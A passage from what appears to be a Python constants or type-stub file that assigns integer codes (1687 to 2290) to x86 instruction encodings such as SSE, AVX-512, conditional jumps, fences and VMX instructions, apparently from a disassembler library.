EVEX_VPSLLD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1687
PSRLQ_MM_IMM8: int = 1688
PSRLQ_XMM_IMM8: int = 1689
VEX_VPSRLQ_XMM_XMM_IMM8: int = 1690
VEX_VPSRLQ_YMM_YMM_IMM8: int = 1691
EVEX_VPSRLQ_XMM_K1Z_XMMM128B64_IMM8: int = 1692
EVEX_VPSRLQ_YMM_K1Z_YMMM256B64_IMM8: int = 1693
EVEX_VPSRLQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1694
PSRLDQ_XMM_IMM8: int = 1695
VEX_VPSRLDQ_XMM_XMM_IMM8: int = 1696
VEX_VPSRLDQ_YMM_YMM_IMM8: int = 1697
EVEX_VPSRLDQ_XMM_XMMM128_IMM8: int = 1698
EVEX_VPSRLDQ_YMM_YMMM256_IMM8: int = 1699
EVEX_VPSRLDQ_ZMM_ZMMM512_IMM8: int = 1700
PSLLQ_MM_IMM8: int = 1701
PSLLQ_XMM_IMM8: int = 1702
VEX_VPSLLQ_XMM_XMM_IMM8: int = 1703
VEX_VPSLLQ_YMM_YMM_IMM8: int = 1704
EVEX_VPSLLQ_XMM_K1Z_XMMM128B64_IMM8: int = 1705
EVEX_VPSLLQ_YMM_K1Z_YMMM256B64_IMM8: int = 1706
EVEX_VPSLLQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1707
PSLLDQ_XMM_IMM8: int = 1708
VEX_VPSLLDQ_XMM_XMM_IMM8: int = 1709
VEX_VPSLLDQ_YMM_YMM_IMM8: int = 1710
EVEX_VPSLLDQ_XMM_XMMM128_IMM8: int = 1711
EVEX_VPSLLDQ_YMM_YMMM256_IMM8: int = 1712
EVEX_VPSLLDQ_ZMM_ZMMM512_IMM8: int = 1713
PCMPEQB_MM_MMM64: int = 1714
PCMPEQB_XMM_XMMM128: int = 1715
VEX_VPCMPEQB_XMM_XMM_XMMM128: int = 1716
VEX_VPCMPEQB_YMM_YMM_YMMM256: int = 1717
EVEX_VPCMPEQB_KR_K1_XMM_XMMM128: int = 1718
EVEX_VPCMPEQB_KR_K1_YMM_YMMM256: int = 1719
EVEX_VPCMPEQB_KR_K1_ZMM_ZMMM512: int = 1720
PCMPEQW_MM_MMM64: int = 1721
PCMPEQW_XMM_XMMM128: int = 1722
VEX_VPCMPEQW_XMM_XMM_XMMM128: int = 1723
VEX_VPCMPEQW_YMM_YMM_YMMM256: int = 1724
EVEX_VPCMPEQW_KR_K1_XMM_XMMM128: int = 1725
EVEX_VPCMPEQW_KR_K1_YMM_YMMM256: int = 1726
EVEX_VPCMPEQW_KR_K1_ZMM_ZMMM512: int = 1727
PCMPEQD_MM_MMM64: int = 1728
PCMPEQD_XMM_XMMM128: int = 1729
VEX_VPCMPEQD_XMM_XMM_XMMM128: int = 1730
VEX_VPCMPEQD_YMM_YMM_YMMM256: int = 1731
EVEX_VPCMPEQD_KR_K1_XMM_XMMM128B32: int = 1732
EVEX_VPCMPEQD_KR_K1_YMM_YMMM256B32: int = 1733
EVEX_VPCMPEQD_KR_K1_ZMM_ZMMM512B32: int = 1734
EMMS: int = 1735
VEX_VZEROUPPER: int = 1736
VEX_VZEROALL: int = 1737
VMREAD_RM32_R32: int = 1738
VMREAD_RM64_R64: int = 1739
EVEX_VCVTTPS2UDQ_XMM_K1Z_XMMM128B32: int = 1740
EVEX_VCVTTPS2UDQ_YMM_K1Z_YMMM256B32: int = 1741
EVEX_VCVTTPS2UDQ_ZMM_K1Z_ZMMM512B32_SAE: int = 1742
EVEX_VCVTTPD2UDQ_XMM_K1Z_XMMM128B64: int = 1743
EVEX_VCVTTPD2UDQ_XMM_K1Z_YMMM256B64: int = 1744
EVEX_VCVTTPD2UDQ_YMM_K1Z_ZMMM512B64_SAE: int = 1745
EXTRQ_XMM_IMM8_IMM8: int = 1746
EVEX_VCVTTPS2UQQ_XMM_K1Z_XMMM64B32: int = 1747
EVEX_VCVTTPS2UQQ_YMM_K1Z_XMMM128B32: int = 1748
EVEX_VCVTTPS2UQQ_ZMM_K1Z_YMMM256B32_SAE: int = 1749
EVEX_VCVTTPD2UQQ_XMM_K1Z_XMMM128B64: int = 1750
EVEX_VCVTTPD2UQQ_YMM_K1Z_YMMM256B64: int = 1751
EVEX_VCVTTPD2UQQ_ZMM_K1Z_ZMMM512B64_SAE: int = 1752
EVEX_VCVTTSS2USI_R32_XMMM32_SAE: int = 1753
EVEX_VCVTTSS2USI_R64_XMMM32_SAE: int = 1754
INSERTQ_XMM_XMM_IMM8_IMM8: int = 1755
EVEX_VCVTTSD2USI_R32_XMMM64_SAE: int = 1756
EVEX_VCVTTSD2USI_R64_XMMM64_SAE: int = 1757
VMWRITE_R32_RM32: int = 1758
VMWRITE_R64_RM64: int = 1759
EVEX_VCVTPS2UDQ_XMM_K1Z_XMMM128B32: int = 1760
EVEX_VCVTPS2UDQ_YMM_K1Z_YMMM256B32: int = 1761
EVEX_VCVTPS2UDQ_ZMM_K1Z_ZMMM512B32_ER: int = 1762
EVEX_VCVTPD2UDQ_XMM_K1Z_XMMM128B64: int = 1763
EVEX_VCVTPD2UDQ_XMM_K1Z_YMMM256B64: int = 1764
EVEX_VCVTPD2UDQ_YMM_K1Z_ZMMM512B64_ER: int = 1765
EXTRQ_XMM_XMM: int = 1766
EVEX_VCVTPS2UQQ_XMM_K1Z_XMMM64B32: int = 1767
EVEX_VCVTPS2UQQ_YMM_K1Z_XMMM128B32: int = 1768
EVEX_VCVTPS2UQQ_ZMM_K1Z_YMMM256B32_ER: int = 1769
EVEX_VCVTPD2UQQ_XMM_K1Z_XMMM128B64: int = 1770
EVEX_VCVTPD2UQQ_YMM_K1Z_YMMM256B64: int = 1771
EVEX_VCVTPD2UQQ_ZMM_K1Z_ZMMM512B64_ER: int = 1772
EVEX_VCVTSS2USI_R32_XMMM32_ER: int = 1773
EVEX_VCVTSS2USI_R64_XMMM32_ER: int = 1774
INSERTQ_XMM_XMM: int = 1775
EVEX_VCVTSD2USI_R32_XMMM64_ER: int = 1776
EVEX_VCVTSD2USI_R64_XMMM64_ER: int = 1777
EVEX_VCVTTPS2QQ_XMM_K1Z_XMMM64B32: int = 1778
EVEX_VCVTTPS2QQ_YMM_K1Z_XMMM128B32: int = 1779
EVEX_VCVTTPS2QQ_ZMM_K1Z_YMMM256B32_SAE: int = 1780
EVEX_VCVTTPD2QQ_XMM_K1Z_XMMM128B64: int = 1781
EVEX_VCVTTPD2QQ_YMM_K1Z_YMMM256B64: int = 1782
EVEX_VCVTTPD2QQ_ZMM_K1Z_ZMMM512B64_SAE: int = 1783
EVEX_VCVTUDQ2PD_XMM_K1Z_XMMM64B32: int = 1784
EVEX_VCVTUDQ2PD_YMM_K1Z_XMMM128B32: int = 1785
EVEX_VCVTUDQ2PD_ZMM_K1Z_YMMM256B32_ER: int = 1786
EVEX_VCVTUQQ2PD_XMM_K1Z_XMMM128B64: int = 1787
EVEX_VCVTUQQ2PD_YMM_K1Z_YMMM256B64: int = 1788
EVEX_VCVTUQQ2PD_ZMM_K1Z_ZMMM512B64_ER: int = 1789
EVEX_VCVTUDQ2PS_XMM_K1Z_XMMM128B32: int = 1790
EVEX_VCVTUDQ2PS_YMM_K1Z_YMMM256B32: int = 1791
EVEX_VCVTUDQ2PS_ZMM_K1Z_ZMMM512B32_ER: int = 1792
EVEX_VCVTUQQ2PS_XMM_K1Z_XMMM128B64: int = 1793
EVEX_VCVTUQQ2PS_XMM_K1Z_YMMM256B64: int = 1794
EVEX_VCVTUQQ2PS_YMM_K1Z_ZMMM512B64_ER: int = 1795
EVEX_VCVTPS2QQ_XMM_K1Z_XMMM64B32: int = 1796
EVEX_VCVTPS2QQ_YMM_K1Z_XMMM128B32: int = 1797
EVEX_VCVTPS2QQ_ZMM_K1Z_YMMM256B32_ER: int = 1798
EVEX_VCVTPD2QQ_XMM_K1Z_XMMM128B64: int = 1799
EVEX_VCVTPD2QQ_YMM_K1Z_YMMM256B64: int = 1800
EVEX_VCVTPD2QQ_ZMM_K1Z_ZMMM512B64_ER: int = 1801
EVEX_VCVTUSI2SS_XMM_XMM_RM32_ER: int = 1802
EVEX_VCVTUSI2SS_XMM_XMM_RM64_ER: int = 1803
EVEX_VCVTUSI2SD_XMM_XMM_RM32_ER: int = 1804
EVEX_VCVTUSI2SD_XMM_XMM_RM64_ER: int = 1805
HADDPD_XMM_XMMM128: int = 1806
VEX_VHADDPD_XMM_XMM_XMMM128: int = 1807
VEX_VHADDPD_YMM_YMM_YMMM256: int = 1808
HADDPS_XMM_XMMM128: int = 1809
VEX_VHADDPS_XMM_XMM_XMMM128: int = 1810
VEX_VHADDPS_YMM_YMM_YMMM256: int = 1811
HSUBPD_XMM_XMMM128: int = 1812
VEX_VHSUBPD_XMM_XMM_XMMM128: int = 1813
VEX_VHSUBPD_YMM_YMM_YMMM256: int = 1814
HSUBPS_XMM_XMMM128: int = 1815
VEX_VHSUBPS_XMM_XMM_XMMM128: int = 1816
VEX_VHSUBPS_YMM_YMM_YMMM256: int = 1817
MOVD_RM32_MM: int = 1818
MOVQ_RM64_MM: int = 1819
MOVD_RM32_XMM: int = 1820
MOVQ_RM64_XMM: int = 1821
VEX_VMOVD_RM32_XMM: int = 1822
VEX_VMOVQ_RM64_XMM: int = 1823
EVEX_VMOVD_RM32_XMM: int = 1824
EVEX_VMOVQ_RM64_XMM: int = 1825
MOVQ_XMM_XMMM64: int = 1826
VEX_VMOVQ_XMM_XMMM64: int = 1827
EVEX_VMOVQ_XMM_XMMM64: int = 1828
MOVQ_MMM64_MM: int = 1829
MOVDQA_XMMM128_XMM: int = 1830
VEX_VMOVDQA_XMMM128_XMM: int = 1831
VEX_VMOVDQA_YMMM256_YMM: int = 1832
EVEX_VMOVDQA32_XMMM128_K1Z_XMM: int = 1833
EVEX_VMOVDQA32_YMMM256_K1Z_YMM: int = 1834
EVEX_VMOVDQA32_ZMMM512_K1Z_ZMM: int = 1835
EVEX_VMOVDQA64_XMMM128_K1Z_XMM: int = 1836
EVEX_VMOVDQA64_YMMM256_K1Z_YMM: int = 1837
EVEX_VMOVDQA64_ZMMM512_K1Z_ZMM: int = 1838
MOVDQU_XMMM128_XMM: int = 1839
VEX_VMOVDQU_XMMM128_XMM: int = 1840
VEX_VMOVDQU_YMMM256_YMM: int = 1841
EVEX_VMOVDQU32_XMMM128_K1Z_XMM: int = 1842
EVEX_VMOVDQU32_YMMM256_K1Z_YMM: int = 1843
EVEX_VMOVDQU32_ZMMM512_K1Z_ZMM: int = 1844
EVEX_VMOVDQU64_XMMM128_K1Z_XMM: int = 1845
EVEX_VMOVDQU64_YMMM256_K1Z_YMM: int = 1846
EVEX_VMOVDQU64_ZMMM512_K1Z_ZMM: int = 1847
EVEX_VMOVDQU8_XMMM128_K1Z_XMM: int = 1848
EVEX_VMOVDQU8_YMMM256_K1Z_YMM: int = 1849
EVEX_VMOVDQU8_ZMMM512_K1Z_ZMM: int = 1850
EVEX_VMOVDQU16_XMMM128_K1Z_XMM: int = 1851
EVEX_VMOVDQU16_YMMM256_K1Z_YMM: int = 1852
EVEX_VMOVDQU16_ZMMM512_K1Z_ZMM: int = 1853
JO_REL16: int = 1854
JO_REL32_32: int = 1855
JO_REL32_64: int = 1856
JNO_REL16: int = 1857
JNO_REL32_32: int = 1858
JNO_REL32_64: int = 1859
JB_REL16: int = 1860
JB_REL32_32: int = 1861
JB_REL32_64: int = 1862
JAE_REL16: int = 1863
JAE_REL32_32: int = 1864
JAE_REL32_64: int = 1865
JE_REL16: int = 1866
JE_REL32_32: int = 1867
JE_REL32_64: int = 1868
JNE_REL16: int = 1869
JNE_REL32_32: int = 1870
JNE_REL32_64: int = 1871
JBE_REL16: int = 1872
JBE_REL32_32: int = 1873
JBE_REL32_64: int = 1874
JA_REL16: int = 1875
JA_REL32_32: int = 1876
JA_REL32_64: int = 1877
JS_REL16: int = 1878
JS_REL32_32: int = 1879
JS_REL32_64: int = 1880
JNS_REL16: int = 1881
JNS_REL32_32: int = 1882
JNS_REL32_64: int = 1883
JP_REL16: int = 1884
JP_REL32_32: int = 1885
JP_REL32_64: int = 1886
JNP_REL16: int = 1887
JNP_REL32_32: int = 1888
JNP_REL32_64: int = 1889
JL_REL16: int = 1890
JL_REL32_32: int = 1891
JL_REL32_64: int = 1892
JGE_REL16: int = 1893
JGE_REL32_32: int = 1894
JGE_REL32_64: int = 1895
JLE_REL16: int = 1896
JLE_REL32_32: int = 1897
JLE_REL32_64: int = 1898
JG_REL16: int = 1899
JG_REL32_32: int = 1900
JG_REL32_64: int = 1901
SETO_RM8: int = 1902
SETNO_RM8: int = 1903
SETB_RM8: int = 1904
SETAE_RM8: int = 1905
SETE_RM8: int = 1906
SETNE_RM8: int = 1907
SETBE_RM8: int = 1908
SETA_RM8: int = 1909
SETS_RM8: int = 1910
SETNS_RM8: int = 1911
SETP_RM8: int = 1912
SETNP_RM8: int = 1913
SETL_RM8: int = 1914
SETGE_RM8: int = 1915
SETLE_RM8: int = 1916
SETG_RM8: int = 1917
VEX_KMOVW_KR_KM16: int = 1918
VEX_KMOVQ_KR_KM64: int = 1919
VEX_KMOVB_KR_KM8: int = 1920
VEX_KMOVD_KR_KM32: int = 1921
VEX_KMOVW_M16_KR: int = 1922
VEX_KMOVQ_M64_KR: int = 1923
VEX_KMOVB_M8_KR: int = 1924
VEX_KMOVD_M32_KR: int = 1925
VEX_KMOVW_KR_R32: int = 1926
VEX_KMOVB_KR_R32: int = 1927
VEX_KMOVD_KR_R32: int = 1928
VEX_KMOVQ_KR_R64: int = 1929
VEX_KMOVW_R32_KR: int = 1930
VEX_KMOVB_R32_KR: int = 1931
VEX_KMOVD_R32_KR: int = 1932
VEX_KMOVQ_R64_KR: int = 1933
VEX_KORTESTW_KR_KR: int = 1934
VEX_KORTESTQ_KR_KR: int = 1935
VEX_KORTESTB_KR_KR: int = 1936
VEX_KORTESTD_KR_KR: int = 1937
VEX_KTESTW_KR_KR: int = 1938
VEX_KTESTQ_KR_KR: int = 1939
VEX_KTESTB_KR_KR: int = 1940
VEX_KTESTD_KR_KR: int = 1941
PUSHW_FS: int = 1942
PUSHD_FS: int = 1943
PUSHQ_FS: int = 1944
POPW_FS: int = 1945
POPD_FS: int = 1946
POPQ_FS: int = 1947
CPUID: int = 1948
BT_RM16_R16: int = 1949
BT_RM32_R32: int = 1950
BT_RM64_R64: int = 1951
SHLD_RM16_R16_IMM8: int = 1952
SHLD_RM32_R32_IMM8: int = 1953
SHLD_RM64_R64_IMM8: int = 1954
SHLD_RM16_R16_CL: int = 1955
SHLD_RM32_R32_CL: int = 1956
SHLD_RM64_R64_CL: int = 1957
MONTMUL_16: int = 1958
MONTMUL_32: int = 1959
MONTMUL_64: int = 1960
XSHA1_16: int = 1961
XSHA1_32: int = 1962
XSHA1_64: int = 1963
XSHA256_16: int = 1964
XSHA256_32: int = 1965
XSHA256_64: int = 1966
XBTS_R16_RM16: int = 1967
XBTS_R32_RM32: int = 1968
XSTORE_16: int = 1969
XSTORE_32: int = 1970
XSTORE_64: int = 1971
XCRYPTECB_16: int = 1972
XCRYPTECB_32: int = 1973
XCRYPTECB_64: int = 1974
XCRYPTCBC_16: int = 1975
XCRYPTCBC_32: int = 1976
XCRYPTCBC_64: int = 1977
XCRYPTCTR_16: int = 1978
XCRYPTCTR_32: int = 1979
XCRYPTCTR_64: int = 1980
XCRYPTCFB_16: int = 1981
XCRYPTCFB_32: int = 1982
XCRYPTCFB_64: int = 1983
XCRYPTOFB_16: int = 1984
XCRYPTOFB_32: int = 1985
XCRYPTOFB_64: int = 1986
IBTS_RM16_R16: int = 1987
IBTS_RM32_R32: int = 1988
CMPXCHG486_RM8_R8: int = 1989
CMPXCHG486_RM16_R16: int = 1990
CMPXCHG486_RM32_R32: int = 1991
PUSHW_GS: int = 1992
PUSHD_GS: int = 1993
PUSHQ_GS: int = 1994
POPW_GS: int = 1995
POPD_GS: int = 1996
POPQ_GS: int = 1997
RSM: int = 1998
BTS_RM16_R16: int = 1999
BTS_RM32_R32: int = 2000
BTS_RM64_R64: int = 2001
SHRD_RM16_R16_IMM8: int = 2002
SHRD_RM32_R32_IMM8: int = 2003
SHRD_RM64_R64_IMM8: int = 2004
SHRD_RM16_R16_CL: int = 2005
SHRD_RM32_R32_CL: int = 2006
SHRD_RM64_R64_CL: int = 2007
FXSAVE_M512BYTE: int = 2008
FXSAVE64_M512BYTE: int = 2009
RDFSBASE_R32: int = 2010
RDFSBASE_R64: int = 2011
FXRSTOR_M512BYTE: int = 2012
FXRSTOR64_M512BYTE: int = 2013
RDGSBASE_R32: int = 2014
RDGSBASE_R64: int = 2015
LDMXCSR_M32: int = 2016
WRFSBASE_R32: int = 2017
WRFSBASE_R64: int = 2018
VEX_VLDMXCSR_M32: int = 2019
STMXCSR_M32: int = 2020
WRGSBASE_R32: int = 2021
WRGSBASE_R64: int = 2022
VEX_VSTMXCSR_M32: int = 2023
XSAVE_MEM: int = 2024
XSAVE64_MEM: int = 2025
PTWRITE_RM32: int = 2026
PTWRITE_RM64: int = 2027
XRSTOR_MEM: int = 2028
XRSTOR64_MEM: int = 2029
INCSSPD_R32: int = 2030
INCSSPQ_R64: int = 2031
XSAVEOPT_MEM: int = 2032
XSAVEOPT64_MEM: int = 2033
CLWB_M8: int = 2034
TPAUSE_R32: int = 2035
TPAUSE_R64: int = 2036
CLRSSBSY_M64: int = 2037
UMONITOR_R16: int = 2038
UMONITOR_R32: int = 2039
UMONITOR_R64: int = 2040
UMWAIT_R32: int = 2041
UMWAIT_R64: int = 2042
CLFLUSH_M8: int = 2043
CLFLUSHOPT_M8: int = 2044
LFENCE: int = 2045
LFENCE_E9: int = 2046
LFENCE_EA: int = 2047
LFENCE_EB: int = 2048
LFENCE_EC: int = 2049
LFENCE_ED: int = 2050
LFENCE_EE: int = 2051
LFENCE_EF: int = 2052
MFENCE: int = 2053
MFENCE_F1: int = 2054
MFENCE_F2: int = 2055
MFENCE_F3: int = 2056
MFENCE_F4: int = 2057
MFENCE_F5: int = 2058
MFENCE_F6: int = 2059
MFENCE_F7: int = 2060
SFENCE: int = 2061
SFENCE_F9: int = 2062
SFENCE_FA: int = 2063
SFENCE_FB: int = 2064
SFENCE_FC: int = 2065
SFENCE_FD: int = 2066
SFENCE_FE: int = 2067
SFENCE_FF: int = 2068
PCOMMIT: int = 2069
IMUL_R16_RM16: int = 2070
IMUL_R32_RM32: int = 2071
IMUL_R64_RM64: int = 2072
CMPXCHG_RM8_R8: int = 2073
CMPXCHG_RM16_R16: int = 2074
CMPXCHG_RM32_R32: int = 2075
CMPXCHG_RM64_R64: int = 2076
LSS_R16_M1616: int = 2077
LSS_R32_M1632: int = 2078
LSS_R64_M1664: int = 2079
BTR_RM16_R16: int = 2080
BTR_RM32_R32: int = 2081
BTR_RM64_R64: int = 2082
LFS_R16_M1616: int = 2083
LFS_R32_M1632: int = 2084
LFS_R64_M1664: int = 2085
LGS_R16_M1616: int = 2086
LGS_R32_M1632: int = 2087
LGS_R64_M1664: int = 2088
MOVZX_R16_RM8: int = 2089
MOVZX_R32_RM8: int = 2090
MOVZX_R64_RM8: int = 2091
MOVZX_R16_RM16: int = 2092
MOVZX_R32_RM16: int = 2093
MOVZX_R64_RM16: int = 2094
JMPE_DISP16: int = 2095
JMPE_DISP32: int = 2096
POPCNT_R16_RM16: int = 2097
POPCNT_R32_RM32: int = 2098
POPCNT_R64_RM64: int = 2099
UD1_R16_RM16: int = 2100
UD1_R32_RM32: int = 2101
UD1_R64_RM64: int = 2102
BT_RM16_IMM8: int = 2103
BT_RM32_IMM8: int = 2104
BT_RM64_IMM8: int = 2105
BTS_RM16_IMM8: int = 2106
BTS_RM32_IMM8: int = 2107
BTS_RM64_IMM8: int = 2108
BTR_RM16_IMM8: int = 2109
BTR_RM32_IMM8: int = 2110
BTR_RM64_IMM8: int = 2111
BTC_RM16_IMM8: int = 2112
BTC_RM32_IMM8: int = 2113
BTC_RM64_IMM8: int = 2114
BTC_RM16_R16: int = 2115
BTC_RM32_R32: int = 2116
BTC_RM64_R64: int = 2117
BSF_R16_RM16: int = 2118
BSF_R32_RM32: int = 2119
BSF_R64_RM64: int = 2120
TZCNT_R16_RM16: int = 2121
TZCNT_R32_RM32: int = 2122
TZCNT_R64_RM64: int = 2123
BSR_R16_RM16: int = 2124
BSR_R32_RM32: int = 2125
BSR_R64_RM64: int = 2126
LZCNT_R16_RM16: int = 2127
LZCNT_R32_RM32: int = 2128
LZCNT_R64_RM64: int = 2129
MOVSX_R16_RM8: int = 2130
MOVSX_R32_RM8: int = 2131
MOVSX_R64_RM8: int = 2132
MOVSX_R16_RM16: int = 2133
MOVSX_R32_RM16: int = 2134
MOVSX_R64_RM16: int = 2135
XADD_RM8_R8: int = 2136
XADD_RM16_R16: int = 2137
XADD_RM32_R32: int = 2138
XADD_RM64_R64: int = 2139
CMPPS_XMM_XMMM128_IMM8: int = 2140
VEX_VCMPPS_XMM_XMM_XMMM128_IMM8: int = 2141
VEX_VCMPPS_YMM_YMM_YMMM256_IMM8: int = 2142
EVEX_VCMPPS_KR_K1_XMM_XMMM128B32_IMM8: int = 2143
EVEX_VCMPPS_KR_K1_YMM_YMMM256B32_IMM8: int = 2144
EVEX_VCMPPS_KR_K1_ZMM_ZMMM512B32_IMM8_SAE: int = 2145
CMPPD_XMM_XMMM128_IMM8: int = 2146
VEX_VCMPPD_XMM_XMM_XMMM128_IMM8: int = 2147
VEX_VCMPPD_YMM_YMM_YMMM256_IMM8: int = 2148
EVEX_VCMPPD_KR_K1_XMM_XMMM128B64_IMM8: int = 2149
EVEX_VCMPPD_KR_K1_YMM_YMMM256B64_IMM8: int = 2150
EVEX_VCMPPD_KR_K1_ZMM_ZMMM512B64_IMM8_SAE: int = 2151
CMPSS_XMM_XMMM32_IMM8: int = 2152
VEX_VCMPSS_XMM_XMM_XMMM32_IMM8: int = 2153
EVEX_VCMPSS_KR_K1_XMM_XMMM32_IMM8_SAE: int = 2154
CMPSD_XMM_XMMM64_IMM8: int = 2155
VEX_VCMPSD_XMM_XMM_XMMM64_IMM8: int = 2156
EVEX_VCMPSD_KR_K1_XMM_XMMM64_IMM8_SAE: int = 2157
MOVNTI_M32_R32: int = 2158
MOVNTI_M64_R64: int = 2159
PINSRW_MM_R32M16_IMM8: int = 2160
PINSRW_MM_R64M16_IMM8: int = 2161
PINSRW_XMM_R32M16_IMM8: int = 2162
PINSRW_XMM_R64M16_IMM8: int = 2163
VEX_VPINSRW_XMM_XMM_R32M16_IMM8: int = 2164
VEX_VPINSRW_XMM_XMM_R64M16_IMM8: int = 2165
EVEX_VPINSRW_XMM_XMM_R32M16_IMM8: int = 2166
EVEX_VPINSRW_XMM_XMM_R64M16_IMM8: int = 2167
PEXTRW_R32_MM_IMM8: int = 2168
PEXTRW_R64_MM_IMM8: int = 2169
PEXTRW_R32_XMM_IMM8: int = 2170
PEXTRW_R64_XMM_IMM8: int = 2171
VEX_VPEXTRW_R32_XMM_IMM8: int = 2172
VEX_VPEXTRW_R64_XMM_IMM8: int = 2173
EVEX_VPEXTRW_R32_XMM_IMM8: int = 2174
EVEX_VPEXTRW_R64_XMM_IMM8: int = 2175
SHUFPS_XMM_XMMM128_IMM8: int = 2176
VEX_VSHUFPS_XMM_XMM_XMMM128_IMM8: int = 2177
VEX_VSHUFPS_YMM_YMM_YMMM256_IMM8: int = 2178
EVEX_VSHUFPS_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 2179
EVEX_VSHUFPS_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 2180
EVEX_VSHUFPS_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 2181
SHUFPD_XMM_XMMM128_IMM8: int = 2182
VEX_VSHUFPD_XMM_XMM_XMMM128_IMM8: int = 2183
VEX_VSHUFPD_YMM_YMM_YMMM256_IMM8: int = 2184
EVEX_VSHUFPD_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 2185
EVEX_VSHUFPD_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 2186
EVEX_VSHUFPD_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 2187
CMPXCHG8B_M64: int = 2188
CMPXCHG16B_M128: int = 2189
XRSTORS_MEM: int = 2190
XRSTORS64_MEM: int = 2191
XSAVEC_MEM: int = 2192
XSAVEC64_MEM: int = 2193
XSAVES_MEM: int = 2194
XSAVES64_MEM: int = 2195
VMPTRLD_M64: int = 2196
VMCLEAR_M64: int = 2197
VMXON_M64: int = 2198
RDRAND_R16: int = 2199
RDRAND_R32: int = 2200
RDRAND_R64: int = 2201
VMPTRST_M64: int = 2202
RDSEED_R16: int = 2203
RDSEED_R32: int = 2204
RDSEED_R64: int = 2205
RDPID_R32: int = 2206
RDPID_R64: int = 2207
BSWAP_R16: int = 2208
BSWAP_R32: int = 2209
BSWAP_R64: int = 2210
ADDSUBPD_XMM_XMMM128: int = 2211
VEX_VADDSUBPD_XMM_XMM_XMMM128: int = 2212
VEX_VADDSUBPD_YMM_YMM_YMMM256: int = 2213
ADDSUBPS_XMM_XMMM128: int = 2214
VEX_VADDSUBPS_XMM_XMM_XMMM128: int = 2215
VEX_VADDSUBPS_YMM_YMM_YMMM256: int = 2216
PSRLW_MM_MMM64: int = 2217
PSRLW_XMM_XMMM128: int = 2218
VEX_VPSRLW_XMM_XMM_XMMM128: int = 2219
VEX_VPSRLW_YMM_YMM_XMMM128: int = 2220
EVEX_VPSRLW_XMM_K1Z_XMM_XMMM128: int = 2221
EVEX_VPSRLW_YMM_K1Z_YMM_XMMM128: int = 2222
EVEX_VPSRLW_ZMM_K1Z_ZMM_XMMM128: int = 2223
PSRLD_MM_MMM64: int = 2224
PSRLD_XMM_XMMM128: int = 2225
VEX_VPSRLD_XMM_XMM_XMMM128: int = 2226
VEX_VPSRLD_YMM_YMM_XMMM128: int = 2227
EVEX_VPSRLD_XMM_K1Z_XMM_XMMM128: int = 2228
EVEX_VPSRLD_YMM_K1Z_YMM_XMMM128: int = 2229
EVEX_VPSRLD_ZMM_K1Z_ZMM_XMMM128: int = 2230
PSRLQ_MM_MMM64: int = 2231
PSRLQ_XMM_XMMM128: int = 2232
VEX_VPSRLQ_XMM_XMM_XMMM128: int = 2233
VEX_VPSRLQ_YMM_YMM_XMMM128: int = 2234
EVEX_VPSRLQ_XMM_K1Z_XMM_XMMM128: int = 2235
EVEX_VPSRLQ_YMM_K1Z_YMM_XMMM128: int = 2236
EVEX_VPSRLQ_ZMM_K1Z_ZMM_XMMM128: int = 2237
PADDQ_MM_MMM64: int = 2238
PADDQ_XMM_XMMM128: int = 2239
VEX_VPADDQ_XMM_XMM_XMMM128: int = 2240
VEX_VPADDQ_YMM_YMM_YMMM256: int = 2241
EVEX_VPADDQ_XMM_K1Z_XMM_XMMM128B64: int = 2242
EVEX_VPADDQ_YMM_K1Z_YMM_YMMM256B64: int = 2243
EVEX_VPADDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2244
PMULLW_MM_MMM64: int = 2245
PMULLW_XMM_XMMM128: int = 2246
VEX_VPMULLW_XMM_XMM_XMMM128: int = 2247
VEX_VPMULLW_YMM_YMM_YMMM256: int = 2248
EVEX_VPMULLW_XMM_K1Z_XMM_XMMM128: int = 2249
EVEX_VPMULLW_YMM_K1Z_YMM_YMMM256: int = 2250
EVEX_VPMULLW_ZMM_K1Z_ZMM_ZMMM512: int = 2251
MOVQ_XMMM64_XMM: int = 2252
VEX_VMOVQ_XMMM64_XMM: int = 2253
EVEX_VMOVQ_XMMM64_XMM: int = 2254
MOVQ2DQ_XMM_MM: int = 2255
MOVDQ2Q_MM_XMM: int = 2256
PMOVMSKB_R32_MM: int = 2257
PMOVMSKB_R64_MM: int = 2258
PMOVMSKB_R32_XMM: int = 2259
PMOVMSKB_R64_XMM: int = 2260
VEX_VPMOVMSKB_R32_XMM: int = 2261
VEX_VPMOVMSKB_R64_XMM: int = 2262
VEX_VPMOVMSKB_R32_YMM: int = 2263
VEX_VPMOVMSKB_R64_YMM: int = 2264
PSUBUSB_MM_MMM64: int = 2265
PSUBUSB_XMM_XMMM128: int = 2266
VEX_VPSUBUSB_XMM_XMM_XMMM128: int = 2267
VEX_VPSUBUSB_YMM_YMM_YMMM256: int = 2268
EVEX_VPSUBUSB_XMM_K1Z_XMM_XMMM128: int = 2269
EVEX_VPSUBUSB_YMM_K1Z_YMM_YMMM256: int = 2270
EVEX_VPSUBUSB_ZMM_K1Z_ZMM_ZMMM512: int = 2271
PSUBUSW_MM_MMM64: int = 2272
PSUBUSW_XMM_XMMM128: int = 2273
VEX_VPSUBUSW_XMM_XMM_XMMM128: int = 2274
VEX_VPSUBUSW_YMM_YMM_YMMM256: int = 2275
EVEX_VPSUBUSW_XMM_K1Z_XMM_XMMM128: int = 2276
EVEX_VPSUBUSW_YMM_K1Z_YMM_YMMM256: int = 2277
EVEX_VPSUBUSW_ZMM_K1Z_ZMM_ZMMM512: int = 2278
PMINUB_MM_MMM64: int = 2279
PMINUB_XMM_XMMM128: int = 2280
VEX_VPMINUB_XMM_XMM_XMMM128: int = 2281
VEX_VPMINUB_YMM_YMM_YMMM256: int = 2282
EVEX_VPMINUB_XMM_K1Z_XMM_XMMM128: int = 2283
EVEX_VPMINUB_YMM_K1Z_YMM_YMMM256: int = 2284
EVEX_VPMINUB_ZMM_K1Z_ZMM_ZMMM512: int = 2285
PAND_MM_MMM64: int = 2286
PAND_XMM_XMMM128: int = 2287
VEX_VPAND_XMM_XMM_XMMM128: int = 2288
VEX_VPAND_YMM_YMM_YMMM256: int = 2289
EVEX_VPANDD_XMM_K1Z_XMM_XMMM128B32: int = 2290
